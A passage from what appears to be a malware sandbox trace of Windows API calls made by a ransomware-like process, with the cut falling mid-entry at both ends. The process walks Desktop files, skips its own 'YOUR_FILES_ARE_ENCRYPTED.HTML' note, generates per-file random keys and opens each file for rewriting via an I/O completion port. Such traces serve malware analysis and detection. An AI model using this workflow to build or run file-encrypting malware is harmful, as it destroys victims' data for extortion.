returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\HRQrWoVqdDX0db4.csv" [0166.114] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.114] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0166.123] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb32bd790, ftCreationTime.dwHighDateTime=0x1d7dbfe, ftLastAccessTime.dwLowDateTime=0x11447df0, ftLastAccessTime.dwHighDateTime=0x1d7dcbd, ftLastWriteTime.dwLowDateTime=0x11447df0, ftLastWriteTime.dwHighDateTime=0x1d7dcbd, nFileSizeHigh=0x0, nFileSizeLow=0x12c7, dwReserved0=0x0, dwReserved1=0x60, cFileName="jjaPO1 SfWeJ9Wx0cO.jpg", cAlternateFileName="JJAPO1~1.JPG")) returned 1 [0166.123] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\jjaPO1 SfWeJ9Wx0cO.jpg") returned 54 [0166.123] lstrcmpW (lpString1="jjaPO1 SfWeJ9Wx0cO.jpg", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.123] PathFindExtensionW (pszPath="jjaPO1 SfWeJ9Wx0cO.jpg") returned=".jpg" [0166.123] lstrlenW (lpString=".jpg") returned 4 [0166.123] PathFindExtensionW (pszPath="jjaPO1 SfWeJ9Wx0cO.jpg") returned=".jpg" [0166.123] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0166.123] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\jjaPO1 SfWeJ9Wx0cO.jpg" (normalized: "c:\\users\\5alr3u30d3\\desktop\\jjapo1 sfwej9wx0co.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0166.124] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=4807) returned 1 [0166.124] GetProcessHeap () returned 0x270000 [0166.124] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0166.125] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="94") returned 2 [0166.125] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="37") returned 2 [0166.125] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="5F") returned 2 [0166.125] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="23") returned 2 [0166.125] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="EA") returned 2 [0166.125] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="7F") returned 2 [0166.125] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="26") returned 2 [0166.125] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="CB") returned 2 [0166.125] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="85") returned 2 [0166.125] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="1A") returned 2 [0166.125] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="7C") returned 2 [0166.125] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="40") returned 2 [0166.125] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="2B") returned 2 [0166.125] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="F8") returned 2 [0166.125] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="C7") returned 2 [0166.125] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="E7") returned 2 [0166.126] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="8D") returned 2 [0166.126] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="9B") returned 2 [0166.126] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="D6") returned 2 [0166.126] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="B2") returned 2 [0166.126] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="87") returned 2 [0166.126] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="ED") returned 2 [0166.126] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="37") returned 2 [0166.126] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="7D") returned 2 [0166.126] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="A1") returned 2 [0166.126] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="31") returned 2 [0166.126] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="4B") returned 2 [0166.126] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="01") returned 2 [0166.126] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="CF") returned 2 [0166.126] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="82") returned 2 [0166.126] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="83") returned 2 [0166.126] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="2D") returned 2 [0166.127] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\jjaPO1 SfWeJ9Wx0cO.jpg" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\jjaPO1 SfWeJ9Wx0cO.jpg") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\jjaPO1 SfWeJ9Wx0cO.jpg" [0166.127] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.127] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0166.137] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c958db0, ftCreationTime.dwHighDateTime=0x1d7de1c, ftLastAccessTime.dwLowDateTime=0x77e1b870, ftLastAccessTime.dwHighDateTime=0x1d7e3bb, ftLastWriteTime.dwLowDateTime=0x77e1b870, ftLastWriteTime.dwHighDateTime=0x1d7e3bb, nFileSizeHigh=0x0, nFileSizeLow=0x1802d, dwReserved0=0x0, dwReserved1=0x60, cFileName="kgq2pSzeYt44pMh3hD.avi", cAlternateFileName="KGQ2PS~1.AVI")) returned 1 [0166.137] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\kgq2pSzeYt44pMh3hD.avi") returned 54 [0166.137] lstrcmpW (lpString1="kgq2pSzeYt44pMh3hD.avi", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.137] PathFindExtensionW (pszPath="kgq2pSzeYt44pMh3hD.avi") returned=".avi" [0166.137] lstrlenW (lpString=".avi") returned 4 [0166.137] PathFindExtensionW (pszPath="kgq2pSzeYt44pMh3hD.avi") returned=".avi" [0166.137] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0166.137] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\kgq2pSzeYt44pMh3hD.avi" (normalized: "c:\\users\\5alr3u30d3\\desktop\\kgq2pszeyt44pmh3hd.avi"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0166.138] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=98349) returned 1 [0166.138] GetProcessHeap () returned 0x270000 [0166.138] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0166.139] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="83") returned 2 [0166.139] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="7C") returned 2 [0166.139] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="A4") returned 2 [0166.139] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="78") returned 2 [0166.139] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="DE") returned 2 [0166.139] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="1F") returned 2 [0166.139] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="A6") returned 2 [0166.139] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="97") returned 2 [0166.139] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="4A") returned 2 [0166.139] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="37") returned 2 [0166.139] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="92") returned 2 [0166.139] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="C5") returned 2 [0166.139] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="0C") returned 2 [0166.139] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="B6") returned 2 [0166.139] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="B6") returned 2 [0166.139] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="19") returned 2 [0166.139] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="00") returned 2 [0166.139] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="8A") returned 2 [0166.139] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="1B") returned 2 [0166.140] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="F1") returned 2 [0166.140] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="7C") returned 2 [0166.140] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="11") returned 2 [0166.140] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="C6") returned 2 [0166.140] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="35") returned 2 [0166.140] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="6A") returned 2 [0166.140] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="4A") returned 2 [0166.140] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="63") returned 2 [0166.140] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="8E") returned 2 [0166.140] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="54") returned 2 [0166.140] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="3B") returned 2 [0166.140] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="AB") returned 2 [0166.140] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="27") returned 2 [0166.141] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\kgq2pSzeYt44pMh3hD.avi" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\kgq2pSzeYt44pMh3hD.avi") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\kgq2pSzeYt44pMh3hD.avi" [0166.141] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.141] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0166.150] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71bf99d0, ftCreationTime.dwHighDateTime=0x1d7d8a3, ftLastAccessTime.dwLowDateTime=0xf16cd100, ftLastAccessTime.dwHighDateTime=0x1d7e633, ftLastWriteTime.dwLowDateTime=0xf16cd100, ftLastWriteTime.dwHighDateTime=0x1d7e633, nFileSizeHigh=0x0, nFileSizeLow=0x12a03, dwReserved0=0x0, dwReserved1=0x60, cFileName="kODA.swf", cAlternateFileName="")) returned 1 [0166.150] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\kODA.swf") returned 40 [0166.150] lstrcmpW (lpString1="kODA.swf", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.150] PathFindExtensionW (pszPath="kODA.swf") returned=".swf" [0166.150] lstrlenW (lpString=".swf") returned 4 [0166.150] PathFindExtensionW (pszPath="kODA.swf") returned=".swf" [0166.150] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13daccd0, ftCreationTime.dwHighDateTime=0x1d7e55b, ftLastAccessTime.dwLowDateTime=0x47cbe850, ftLastAccessTime.dwHighDateTime=0x1d7e57c, ftLastWriteTime.dwLowDateTime=0x47cbe850, ftLastWriteTime.dwHighDateTime=0x1d7e57c, nFileSizeHigh=0x0, nFileSizeLow=0xe131, dwReserved0=0x0, dwReserved1=0x60, cFileName="l-iuN1.bmp", cAlternateFileName="")) returned 1 [0166.150] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\l-iuN1.bmp") returned 42 [0166.150] lstrcmpW (lpString1="l-iuN1.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.150] PathFindExtensionW (pszPath="l-iuN1.bmp") returned=".bmp" [0166.156] lstrlenW (lpString=".bmp") returned 4 [0166.156] PathFindExtensionW (pszPath="l-iuN1.bmp") returned=".bmp" [0166.156] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8cdeac90, ftCreationTime.dwHighDateTime=0x1d7dc65, ftLastAccessTime.dwLowDateTime=0xe5921fd0, ftLastAccessTime.dwHighDateTime=0x1d7e3df, ftLastWriteTime.dwLowDateTime=0xe5921fd0, ftLastWriteTime.dwHighDateTime=0x1d7e3df, nFileSizeHigh=0x0, nFileSizeLow=0xb931, dwReserved0=0x0, dwReserved1=0x60, cFileName="MKov.avi", cAlternateFileName="")) returned 1 [0166.156] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\MKov.avi") returned 40 [0166.156] lstrcmpW (lpString1="MKov.avi", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.156] PathFindExtensionW (pszPath="MKov.avi") returned=".avi" [0166.157] lstrlenW (lpString=".avi") returned 4 [0166.157] PathFindExtensionW (pszPath="MKov.avi") returned=".avi" [0166.157] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0166.157] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\MKov.avi" (normalized: "c:\\users\\5alr3u30d3\\desktop\\mkov.avi"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0166.157] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=47409) returned 1 [0166.157] GetProcessHeap () returned 0x270000 [0166.157] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0166.158] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="E1") returned 2 [0166.158] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="BF") returned 2 [0166.158] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="2A") returned 2 [0166.158] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="90") returned 2 [0166.158] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="8D") returned 2 [0166.158] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="B8") returned 2 [0166.158] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="D2") returned 2 [0166.159] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="21") returned 2 [0166.159] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="A6") returned 2 [0166.159] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="CD") returned 2 [0166.159] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="B8") returned 2 [0166.159] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="CC") returned 2 [0166.159] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="24") returned 2 [0166.159] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="6A") returned 2 [0166.159] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="1D") returned 2 [0166.159] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="D4") returned 2 [0166.159] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="8E") returned 2 [0166.159] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="C8") returned 2 [0166.159] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="92") returned 2 [0166.159] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="31") returned 2 [0166.159] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="01") returned 2 [0166.159] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="F6") returned 2 [0166.159] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="32") returned 2 [0166.159] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="29") returned 2 [0166.159] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="1A") returned 2 [0166.159] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="3E") returned 2 [0166.159] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="D3") returned 2 [0166.159] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="90") returned 2 [0166.159] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="06") returned 2 [0166.159] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="A8") returned 2 [0166.159] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="72") returned 2 [0166.160] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="17") returned 2 [0166.160] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\MKov.avi" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\MKov.avi") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\MKov.avi" [0166.160] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.160] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0166.173] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8acf57a0, ftCreationTime.dwHighDateTime=0x1d7ddf1, ftLastAccessTime.dwLowDateTime=0x55908060, ftLastAccessTime.dwHighDateTime=0x1d7e629, ftLastWriteTime.dwLowDateTime=0x55908060, ftLastWriteTime.dwHighDateTime=0x1d7e629, nFileSizeHigh=0x0, nFileSizeLow=0x5bfa, dwReserved0=0x0, dwReserved1=0x60, cFileName="NMRn3Fz86tX17DjR6.jpg", cAlternateFileName="NMRN3F~1.JPG")) returned 1 [0166.173] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\NMRn3Fz86tX17DjR6.jpg") returned 53 [0166.173] lstrcmpW (lpString1="NMRn3Fz86tX17DjR6.jpg", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.173] PathFindExtensionW (pszPath="NMRn3Fz86tX17DjR6.jpg") returned=".jpg" [0166.173] lstrlenW (lpString=".jpg") returned 4 [0166.173] PathFindExtensionW (pszPath="NMRn3Fz86tX17DjR6.jpg") returned=".jpg" [0166.173] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0166.173] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\NMRn3Fz86tX17DjR6.jpg" (normalized: "c:\\users\\5alr3u30d3\\desktop\\nmrn3fz86tx17djr6.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0166.174] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=23546) returned 1 [0166.174] GetProcessHeap () returned 0x270000 [0166.174] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0166.175] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="D9") returned 2 [0166.175] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="FF") returned 2 [0166.175] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="3D") returned 2 [0166.175] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="BB") returned 2 [0166.175] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="B5") returned 2 [0166.175] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="DE") returned 2 [0166.175] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="B0") returned 2 [0166.175] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="B2") returned 2 [0166.175] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="C1") returned 2 [0166.175] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="1A") returned 2 [0166.175] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="14") returned 2 [0166.175] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="1E") returned 2 [0166.175] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="31") returned 2 [0166.175] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="42") returned 2 [0166.175] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="81") returned 2 [0166.176] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="02") returned 2 [0166.176] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="0D") returned 2 [0166.176] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="99") returned 2 [0166.176] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="8B") returned 2 [0166.176] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="FD") returned 2 [0166.176] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="47") returned 2 [0166.176] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="87") returned 2 [0166.176] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="F8") returned 2 [0166.176] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="7C") returned 2 [0166.176] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="7A") returned 2 [0166.177] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\NMRn3Fz86tX17DjR6.jpg" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\NMRn3Fz86tX17DjR6.jpg") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\NMRn3Fz86tX17DjR6.jpg" [0166.177] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.177] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0166.192] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37183ae0, ftCreationTime.dwHighDateTime=0x1d7dfd2, ftLastAccessTime.dwLowDateTime=0x7a3567c0, ftLastAccessTime.dwHighDateTime=0x1d7e01e, ftLastWriteTime.dwLowDateTime=0x7a3567c0, ftLastWriteTime.dwHighDateTime=0x1d7e01e, nFileSizeHigh=0x0, nFileSizeLow=0xfd3b, dwReserved0=0x0, dwReserved1=0x60, cFileName="nP4M5QM-M9H.pdf", cAlternateFileName="NP4M5Q~1.PDF")) returned 1 [0166.192] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\nP4M5QM-M9H.pdf") returned 47 [0166.192] lstrcmpW (lpString1="nP4M5QM-M9H.pdf", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.192] PathFindExtensionW (pszPath="nP4M5QM-M9H.pdf") returned=".pdf" [0166.192] lstrlenW (lpString=".pdf") returned 4 [0166.192] PathFindExtensionW (pszPath="nP4M5QM-M9H.pdf") returned=".pdf" [0166.192] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0166.192] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\nP4M5QM-M9H.pdf" (normalized: "c:\\users\\5alr3u30d3\\desktop\\np4m5qm-m9h.pdf"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0166.194] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=64827) returned 1 [0166.194] GetProcessHeap () returned 0x270000 [0166.194] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0166.195] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\nP4M5QM-M9H.pdf" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\nP4M5QM-M9H.pdf") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\nP4M5QM-M9H.pdf" [0166.195] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.195] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0166.206] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a6b0ae0, ftCreationTime.dwHighDateTime=0x1d7df8e, ftLastAccessTime.dwLowDateTime=0x41295620, 